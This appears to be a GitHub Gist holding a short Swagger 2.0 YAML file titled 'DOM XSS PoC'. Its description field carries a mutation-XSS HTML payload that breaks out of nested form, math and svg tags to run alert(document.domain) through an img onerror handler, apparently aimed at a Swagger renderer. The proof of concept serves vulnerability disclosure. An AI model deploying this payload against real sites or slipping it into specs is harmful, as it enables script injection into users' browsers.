Created
March 18, 2023 13:04
-
-
Save joelczk/f43ebff08688d22e99e69d7d14639310 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
info: | |
version: "0.0.1" | |
title: DOM XSS PoC | |
description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1>"></form> | |
paths: | |
/: | |
get: | |
responses: | |
200: | |
description: Success |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment